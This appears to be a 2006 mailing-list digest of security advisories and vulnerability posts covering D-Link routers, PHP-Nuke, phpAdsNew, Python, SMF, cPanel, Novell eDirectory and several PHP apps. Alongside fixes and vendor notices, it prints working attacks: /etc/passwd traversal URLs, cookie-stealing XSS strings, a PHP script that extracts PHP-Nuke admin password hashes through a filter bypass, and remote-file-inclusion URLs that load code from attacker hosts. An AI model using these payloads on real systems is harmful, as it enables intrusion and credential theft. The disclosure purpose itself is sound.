D-Link DSL-G624T ADSL Router is vulnerable to several securities. Directory transversal http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml Cross Site Scripting Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fstate Value:: >">alert(20102006)%3B Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fconnection Value:: >">alert(20102006)%3B Url:: http://router/cgi-bin/webcm Method:: POST Variable:: upnp%3Asettings%2Fconnection Value:: "+onmouseover="alert(20102006) Directory listing Is possible to list the /cgi-bin directory Tested on D-Link DSL-G624T Version: Firmware Version : V3.00B01T01.YA-C.20060616 Discovered by: José Ramón Palanco: jose.palanco(at)eazel(dot).es http://www.eazel.es Original advisory: http://www.eazel.es/advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html
[PHPADSNEW-SA-2006-002] phpAdsNew and phpPgAds 2.0.8-pr1 fix XSS vulnerability
phpAdsNew / phpPgAds security advisory PHPADSNEW-SA-2006-002 Advisory ID: PHPADSNEW-SA-2006-002 Date: 2006-Oct-28 Security risk: medium risk Applications affected: phpAdsNew, phpPgAds Applications not affected: Max Media Manager v0.1.x - v0.3.x Versions affected: <= 2.0.8 Versions not affected: >= 2.0.8-pr1 Vulnerability: HTML injection / Cross-site scripting Description --- Some scripts inside the admin interface were displaying parameters collected by the delivery scripts without proper sanitizing or escaping. The delivery scripts have public access, while the admin interface is restricted to logged in users. An attacker could inject HTML/XSS code which could be displayed/executed in a later time inside the admin interface. Solutions - - Upgrade to phpAdsNew or phpPgAds 2.0.8-pr1. Contact informations The security contact for phpAdsNew and phpPgAds can be reached at: Best regards -- Matteo Beccati http://phpadsnew.com http://phppgads.com
-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities==-
/*
[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22
Program: PHP Nuke
Homepage: http://www.php.net
Vulnerable Versions: PHP Nuke <= 7.9
Risk: High!
Impact: Critical Risk
-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection
vulnerabilities==-
-
- Description
-
PHP-Nuke is a news automated system specially designed to be used in Intranets
and Internet. The Administrator has total control of his web site, registered
users, and he will have in the hand a powerful assembly of tools to maintain an
active and 100% interactive web site using databases.
- Tested
-
localhost & many sites
- Vulnerability Description
-
The most important and critical vulnerability is in the code designed to filter
the POST inputs to protect the script against
SQL Injections.
==[ mainfile.php 143-146 ]==
[...]
if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ')
OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,'
union ') OR stripos_clone($postString_64,'+union+')) {
header("Location: index.php");
die();
}
[...]
==[ end mainfile.php ]==
The protection is very good... but we can bypass it by using something like
'/**/UNION ' or ' UNION/**/' ;)
Also i found a SQL Injection vulnerability in the Encyclopedia module. The
"eid" variable isn't filtered at any moment, so if
we bypass the sql injection protection we can execute arbitrary sql commands.
With a simple UNION statement we get the
md5 hash of the admin password.
Here is the real life Proof of Concept exploit.
==Real Proof of Concept exploit==
http://www.neosecurityteam.net
*/
$host="localhost";
$path="/phpnuke/";
$prefix="nuke_";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors
WHERE '1'='1";
if ($fp) {
$p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
$p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, */*\r\n";
$p.="Referer:
http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n";;
$p.="Accept-Language: es-ar\r\n";
$p.="Content-Type: application/x-www-form-urlencoded\r\n";
$p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$p.="Host: localhost\r\n";
$p.="Content-Length: ".strlen($data)."\r\n";
$p.="Pragma: no-cache\r\n";
$p.="Connection: keep-alive\r\n\r\n";
$p.=$data;
fwrite($fp, $p);
while (!feof($fp)) {
$content .= fread($fp, 4096);
}
preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);
print_r($matches);
}
?>
==Real Proof of Concept exploit==
Whit this PoC code i get the md5 hash of the first admin (God) of the
nuke_authors table.
- How to fix it? More information?
You can found a patch on http://www.neosecurityteam.net/foro/
Also, you can modify the line 143 of mainfile.php, adding one more protection
like:
==[ mainfile.php old line (143) ]==
[...]
if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ')
OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,'
union ') OR stripos_clone($postString_64,'+union+')) {
}
[...]
==[ end mainfile.php ]=
==[ mainfile.php new line (143) ]==
[...]
if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ')
OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,'
union ') OR stripos_clone($postString_64,'+union+') OR
stripos_clone($postString_64,
'*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {
}
[...]
==[ end mainfile.php ]=
That's a momentary solution to the problem. I recommend to download the PHP
Nuke 8.0 version in the next days... it is not
free at the moment.
- References
http://www.neosecurityteam.net/index.php?action=advisories&id=27
- Credits
Anti SQL Injection protection bypass by Paisterist -> pai
[SECURITY] [DSA 1197-1] New python2.4 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1197-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff October 22nd, 2006 http://www.debian.org/security/faq - -- Package: python2.4 Vulnerability : buffer overflow Problem-Type : local(remote) Debian-specific: no CVE ID : CVE-2006-4980 Debian Bug : 391589 Benjamin C. Wiley Sittler discovered that the repr() of the Python interpreter allocates insufficient memory when parsing UCS-4 Unicode strings, which might lead to execution of arbitrary code through a buffer overflow. For the stable distribution (sarge) this problem has been fixed in version 2.4.1-2sarge1. Due to build problems this update lacks fixed packages for the m68k architecture. Once they are sorted out, binaries for m68k will be released. For the unstable distribution (sid) this problem has been fixed in version 2.4.4-1. We recommend that you upgrade your Python 2.4 packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1.dsc Size/MD5 checksum: 1094 c32c8fdbdc8579afa65a35811fd0f447 http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1.diff.gz Size/MD5 checksum: 2588405 b06709694f4fd3b04ddd0316403f3528 http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1.orig.tar.gz Size/MD5 checksum: 9205762 0475655d5c6f7919fc977c42c1103af8 Architecture independent components: http://security.debian.org/pool/updates/main/p/python2.4/idle-python2.4_2.4.1-2sarge1_all.deb Size/MD5 checksum: 239606 7bfff5388898e8fa7696f34e59035779 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-doc_2.4.1-2sarge1_all.deb Size/MD5 checksum: 3217000 0a26b7cfe7aac553b0f9e5fdd228 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-examples_2.4.1-2sarge1_all.deb Size/MD5 checksum: 578596 e789e6a59b4110f986614157d83ac1ec Alpha architecture: http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_alpha.deb Size/MD5 checksum: 3610318 cdf1d11305fee01f3eeea87bbae45266 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_alpha.deb Size/MD5 checksum: 6995312 a00b457959904c463a227389b5ee2d1b http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_alpha.deb Size/MD5 checksum: 1846778 4200b817da114fbf781d0e2ee7c3f125 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-gdbm_2.4.1-2sarge1_alpha.deb Size/MD5 checksum:27158 c8214711b8b8c020fa6fe1c5b430857d http://security.debian.org/pool/updates/main/p/python2.4/python2.4-tk_2.4.1-2sarge1_alpha.deb Size/MD5 checksum: 111724 78583460f1f16a560346416dafdd1e97 AMD64 architecture: http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_amd64.deb Size/MD5 checksum: 3644420 f1e366e9de8c4583201db00823e740b0 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_amd64.deb Size/MD5 checksum: 7596356 656640c35bcf86aef6af768b754191f8 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_amd64.deb Size/MD5 checksum: 1680266 56874b34d708320d9563bf322c009950 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-gdbm_2.4.1-2sarge1_amd64.deb Size/MD5 checksum:26752 5c432a87748ebf5c1299684a5b995bcf http://security.debian.org/pool/updates/main/p/python2.4/python2.4-tk_2.4.1-2sarge1_amd64.deb Size/MD5 checksum: 110664 1abaea30247985cecb0f0c394a532bbc ARM architecture: http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.1-2sarge1_arm.deb Size/MD5 checksum: 3476134 d9122efe777d8782fde2a8ed06db0456 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.1-2sarge1_arm.deb Size/MD5 checksum: 7773024 0cfac06be44113fc5328878559265408 http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.1-2sarge1_arm.deb Size/MD5 checksum: 1740512 f2dbd9a91f0168c2a54ff5e85991f797 http://securi
Re: Simple Machines Forum (SMF) XSS issue
I wouldn't rely on that library by itself. As I emailed Kallahar quite
a while ago about it is still vulnerable to at least one issue:
This works in IE6.0 and Opera 9.0. What it is doing is converting HTML
entities into their ASCII equivalent. By doing that he is changing my
string, " " into " " which is a newline, and injected
within the javascript directive it breaks it up. This is a pretty good
example of why conversion filters can be used against you.
-RSnake
http://ha.ckers.org/
http://sla.ckers.org/
On Sat, 21 Oct 2006, [EMAIL PROTECTED] wrote:
Good find on this.
Here is the fix I applied:
Find on line ~85 in Sources/Search.php:
foreach ($temp_params as $i => $data)
{
@list ($k, $v) = explode('|\'|', $data);
$context['search_params'][$k] = stripslashes($v);
}
Change to:
foreach ($temp_params as $i => $data)
{
@list ($k, $v) = explode('|\'|', $data);
$context['search_params'][$k] = RemoveXSS(stripslashes($v));
}
The RemoveXSS function is taken from the following site:
http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php
I hope that handles all the issue related to this.
AROUNDMe 0.6.9 remonte file inclusion
==
AROUNDMe 0.6.9 remonte file inclusion
vendor site: http://barnraiser.org/
vulnerable versions: 0.6.9 (and possibly older)
discovered by: noislet ( http://www.noislet.org/ )
vendor informed: 21.10.2006
published: 22.10.2006
==
product info:
AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.
==
bug details:
Input passed to the "$templatePath" is not verified before being used
to include files.
required:
register_globals = On
file:
pol_view.tpl.php (and others)
buggy code:
if (isset($poll)) {
...
include $templatePath . "poll_detail.inc.tpl.php";
==
example exploitation:
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00
--
noislet
\ page http://www.noislet.org/
PHP Generator of Object SQL Database (path) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= PHP Generator of Object SQL Database (path) Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Author: xoron Tum islam aleminin Ramazan Bayrami Mubarek oLsun..! Ne mutlu türküm diyene -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= CODE: include $path."/misc/listoption.php3"; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: http://www.hedef.com/[script_path]/misc/function.php3?path=http://evil_script? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, k1tk4t, x_w0x,OG Tesekkurler: DJR, mdx, R3D4C!D, sakkure, ENTRIKA, ERNE:) www.milw0rm.com www.team-rootshell.com www.cyber-warrior.org irc.milw0rm.com #milw0rm -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= script down: http://vidalcharles.free.fr/pgosd/pgosd.tgz # milw0rm.com [2006-10-22]
WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss Vulnerability
# WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss Vulnerability # By Crackers_Child [EMAIL PROTECTED] www.sibersavacilar.com # Exploit # site.com:2082/scripts/dosetmytheme?theme=[XssCodes] site.com:2082/scripts2/editzonetemplate?template=[XssCodes] # Examples site.com:2082/scripts/dosetmytheme?theme=alert(document.cookie) site.com:2082/scripts2/editzonetemplate?template=alert(document.cookie) site.com:2082/scripts2/editzonetemplate?template=alert(/HACKED BY CRACKERS_CHİLD/) # Greetz:All My Friends ! # ### WWW.sibersavascilar.com ##
speedberg <= 1.2beta1 Remote File Inclusion
# speedberg <= 1.2beta1 Remote File Inclusion # Download Source : http://www.myepfl.ch/speedberg/files/speedberg-1.2beta1.zip # # Found By: k1tk4t - k1tk4t[4t]newhack.org # Location: Indonesia -- #newhack[dot]org @irc.dal.net file; entrancePage.tpl.php generalToolBox.tlb.php myToolBox.tlb.php scriplet.inc.php simplePage.tpl.php speedberg.class.php standardPage.tpl.php exploit; http://localhost/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://shell http://localhost/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://shell http://localhost/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://shell http://localhost/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://shell http://localhost/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://shell http://localhost/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://shell http://localhost/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://shell Thanks; str0ke xoron [www.xoron.biz] [mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 evilcode,illibero,NoGe,nyubi,x-ace,ghoz, home_edition2001,matdhule,iFX, and for all(friend's&enemy) @irc.dal.net #newhack[dot]org [all member&staff] #e-c-h-o [all member echo community] #nyubicrew [all member solpotcrew community] #asiahacker [all member asiahacker community]
XSS in Zwahlen Online Shop
Hi list,
there is a XSS in Zwahlen's Online Shop. I can only test the free
version, but i think, other versions may be vulnerable, too.
http://host/article.htm?cat=alert("fix your bugs!")
Kind Regards
MC.Iglo
iDefense Security Advisory 10.21.06: Novell eDirectory evtFilteredMonitorEventsRequest Invalid Free Vulnerability
Novell eDirectory evtFilteredMonitorEventsRequest Invalid Free Vulnerability iDefense Security Advisory 10.21.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 21, 2006 I. BACKGROUND Novell eDirectory is a cross-platform lightweight directory access protocol (LDAP) server. More information can be found on Novell's web site at http://www.novell.com/products/edirectory/ II. DESCRIPTION Remote exploitation of an invalid free vulnerability in Novell Inc.'s eDirectory product could allow an attacker to execute arbitrary code in the context of the running daemon. The evtFilteredMonitorEventsRequest function takes an array of objects that contain an allocated string and two integer values. When an attacker supplies less objects than is specified by the number of objects to be sent, an invalid free condition arises. Due to the cleanup loop being bound by the number supplied within the request rather than the number actually processed, the free() function will be called on values on the heap which are outside of the bounds of the allocated array. III. ANALYSIS Successful exploitation of this vulnerability could allow an attacker to crash the server or execute arbitrary code. No credentials are required. Typically this daemon runs with administrator privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested and found to be vulnerable. Earlier versions are suspected to be vulnerable. V. WORKAROUND It is possible to disable the LDAP service from running via the ndsmodules.conf file which is usually located in /etc/opt/novell/eDirectory/conf. However, doing so greatly reduces the functionality of this program. VI. VENDOR RESPONSE Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1. You can obtain the Linux/Unix version of this update from their site at: http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/ The windows version of this update is available at: http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4510 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/17/2006 Initial vendor notification 08/18/2006 Initial vendor response 10/06/2006 Second vendor notification 10/20/2006 Vendor update released 10/21/2006 Public disclosure IX. CREDIT Joshua J. Drake (iDefense Labs) is credited with the discover of this vulnerability. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 10.21.06: Novell eDirectory NCP over IP length Heap Overflow Vulnerability
Novell eDirectory NCP over IP length Heap Overflow Vulnerability iDefense Security Advisory 10.21.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 21, 2006 I. BACKGROUND Novell eDirectory is a cross-platform lightweight directory access protocol (LDAP) server. In addition to LDAP, eDirectory also implements NCP over IP. More information can be obtained from the Novell's web site at http://www.novell.com/products/edirectory/ II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Novell Inc.'s eDirectory product could allow an attacker to execute arbitrary code in the context of the running daemon. This vulnerability specifically exists within the NCP functionality of eDirectory. A specially crafted packet will cause eDirectory to read a user specified amount of user supplied data into a static sized heap buffer. The NCP engine does not verify that the supplied data will fit inside the allocated heap buffer bounds. As such, a heap buffer overflow Curr's. III. ANALYSIS Successful exploitation of this vulnerability could allow an attacker to crash the server or execute arbitrary code. No credentials are required. Typically this daemon runs with administrator privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested and found to be vulnerable. Earlier versions are suspected to be vulnerable. V. WORKAROUND iDefense is unaware of any effective workaround for this issue. VI. VENDOR RESPONSE Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1. You can obtain the Linux/Unix version of this update from their site at: http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/ The windows version of this update is available at: http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4177 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/16/2006 Initial vendor notification 08/17/2006 Initial vendor response 10/06/2006 Second vendor notification 10/20/2006 Vendor update released 10/21/2006 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 10.21.06: Novell eDirectory evtFilteredMonitorEventsRequest Heap Overflow Vulnerability
Novell eDirectory evtFilteredMonitorEventsRequest Heap Overflow Vulnerability iDefense Security Advisory 10.21.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 21, 2006 I. BACKGROUND Novell eDirectory is a cross-platform lightweight directory access protocol (LDAP) server. More information can be found on Novell's web site at http://www.novell.com/products/edirectory/ II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Novell Inc.'s eDirectory product could allow an attacker to execute arbitrary code in the context of the running daemon. This problem stems from an integer overflow that occurs when allocating memory for attacker supplied data. The evtFilteredMonitorEventsRequest function takes user input and multiplies it by 16, then adds 16 without first validating that an integer overflow will not occur. If allocation succeeds, the function will proceed to loop, filling the memory with partially controllable input. Since the loop is bounded directly by the attacker supplied length value, heap overflow will occur. III. ANALYSIS Successful exploitation of this vulnerability could allow an attacker to crash the server or execute arbitrary code. No credentials are required. Typically this daemon runs with administrator privileges. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested and found to be vulnerable. Earlier versions are suspected to be vulnerable. V. WORKAROUND It is possible to disable the LDAP service from running via the ndsmodules.conf file which is usually located in /etc/opt/novell/eDirectory/conf. However, doing so greatly reduces the functionality of this program. VI. VENDOR RESPONSE Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1. You can obtain the Linux/Unix version of this update from their site at: http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/ The windows version of this update is available at: http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4509 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/17/2006 Initial vendor notification 08/18/2006 Initial vendor response 10/06/2006 Second vendor notification 10/20/2006 Vendor update released 10/21/2006 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
IPEER Remote file inclusion
Product:http://ipeer.apsc.ubc.ca/ipeer_site/ version: 2.0 (I assume others too) vulnerability: http://some_host/ipeer_site/?page=http://evilness/evil.txt?
